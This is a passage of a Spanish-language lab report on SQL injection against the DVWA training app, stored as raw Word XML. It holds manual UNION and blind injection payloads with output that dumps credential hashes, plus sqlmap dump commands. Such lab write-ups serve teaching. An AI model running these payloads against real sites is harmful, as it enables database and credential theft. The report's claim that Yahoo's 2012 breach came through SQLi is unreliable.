                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Out-of-band</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="734F1BA2">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Los datos se extraen por un canal diferente al HTTP (DNS, SMB). Usado cuando in-band y blind no funcionan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9C8F3E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tráfico DNS/SMB hacia el servidor del atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="453A60AD"/>
    <w:p w14:paraId="1C871F6D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Impacto histórico de SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB6127">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Yahoo (2012): 3 billones de cuentas comprometidas vía SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495C13E">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Sony Pictures (2011): exfiltración masiva de datos mediante inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7327F4B3">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>RockYou (2009): 32 millones de contraseñas en texto plano expuestas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E79DA16">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Heartland Payment Systems (2008): 130 millones de tarjetas de crédito robadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F11387"/>
    <w:p w14:paraId="03E95DFC">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fragmento de código vulnerable (DVWA nivel Low):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251689B4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Concatenación directa — patrón inseguro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$id = $_REQUEST['id'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$result = mysql_query($query);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Problemas: mysql_query() deprecada, sin prepared statements,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// sin validación de tipo, mensajes de error MySQL visibles al usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA8BE5">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1153B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El módulo SQL Injection de DVWA permite buscar usuarios por ID. El valor del parámetro id se concatena directamente en la query SQL sin sanitización. Una comilla simple en el input cierra la cadena de la query, permitiendo al atacante inyectar SQL arbitrario: filtrar registros, unir tablas mediante UNION SELECT, leer la base de datos completa o modificar/eliminar datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5855A5B7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08035252">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C4FF9D">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No se usa mysql_real_escape_string(), PDO con prepared statements ni ninguna función de parametrización. El input se incluye directamente en la query como cadena.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224A1D5"/>
    <w:p w14:paraId="57E49ED8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3F01D">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La aplicación construye la query dinámicamente concatenando strings. Este patrón es intrínsecamente inseguro porque no separa código (SQL) de datos (input). La solución arquitectónica es usar consultas preparadas, donde el motor SQL recibe la estructura de la query y los datos por separado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BB0A1"/>
    <w:p w14:paraId="07D3430D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de entradas y salidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C8667">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Los mensajes de error de MySQL son visibles al usuario (nivel Low), revelando estructura de tablas y tipos de datos. La función mysql_query() está deprecada desde PHP 5.5. El tipo del parámetro id no se valida (debería ser entero).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C3D4A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Mecanismo de ataque — SQL Injection Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047702DF">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: extraer todos los usuarios y contraseñas de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F1E4B"/>
    <w:p w14:paraId="70958BE1">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 1 — Confirmar vulnerabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5855E050">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Input: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ Error: You have an error in your SQL syntax...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Confirma que el input se interpreta como SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE39B51">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 2 — Determinar número de columnas (ORDER BY):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A657CD4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' ORDER BY 1-- -   → funciona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' ORDER BY 2-- -   → funciona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' ORDER BY 3-- -   → error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ La query retorna 2 columnas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81F761">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 3 — Identificar columnas visibles (UNION SELECT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E27474">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' UNION SELECT 'a','b'-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ Ambas columnas son visibles en la respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D9388">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 4 — Extraer nombre de BD y versión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB44D8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' UNION SELECT database(), version()-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ dvwa | 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A777B98">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 8 — UNION SELECT mostrando nombre de BD y versión MySQL — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B8FC65">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 5 — Enumerar tablas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258AFF8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' UNION SELECT table_name, NULL FROM information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   WHERE table_schema=database()-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ guestbook, users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD88A7">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 6 — Extraer columnas de la tabla users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E08D9F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' UNION SELECT column_name, NULL FROM information_schema.columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   WHERE table_name='users'-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ user_id, first_name, last_name, user, password, avatar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574AF9BC">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 7 — Volcar credenciales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417ABF5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' UNION SELECT user, password FROM users-- -</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 admin   | 5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ gordonb | e99a18c428cb38d5f260853678922e03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>→ pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7</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MD5 crackeados: admin=password, pablo=letmein</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC325A7">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 9 — Extracción completa de tabla users con hashes — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD18231">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3b. Ataque automatizado con sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2906DE07">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: automatizar la extracción completa de la BD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674FB21"/>
    <w:p w14:paraId="38C4B484">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Detectar vulnerabilidad y enumerar bases de datos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ sqlmap \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u "http://&lt;IP&gt;/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --cookie="PHPSESSID=&lt;id&gt;;security=low" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --dbs</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 Volcar tabla users (incluye crackeo de hashes MD5 automático)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ sqlmap \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u "http://&lt;IP&gt;/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --cookie="PHPSESSID=&lt;id&gt;;security=low" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -D dvwa -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404AF4A9">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 10 — sqlmap volcando tabla users y crackeando hashes — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECAA5A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3c. SQL Injection Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E9109">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La sección SQL Injection (Blind) de DVWA no muestra los datos de la query, solo responde "User ID exists." o "MISSING". El atacante infiere datos carácter por carácter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259C8A4"/>
    <w:p w14:paraId="41895084">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Técnica Boolean-based Blind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C608A7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-- ¿La primera letra de la BD es 'd'?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' AND SUBSTRING(database(),1,1)='d'-- -   → 'exists' (VERDADERO)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1' AND SUBSTRING(database(),1,1)='a'-- -   → 'missing' (FALSO)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-- Repetir para cada carácter → reconstruye 'dvwa' en 4 peticiones por carácter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C341EEA">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
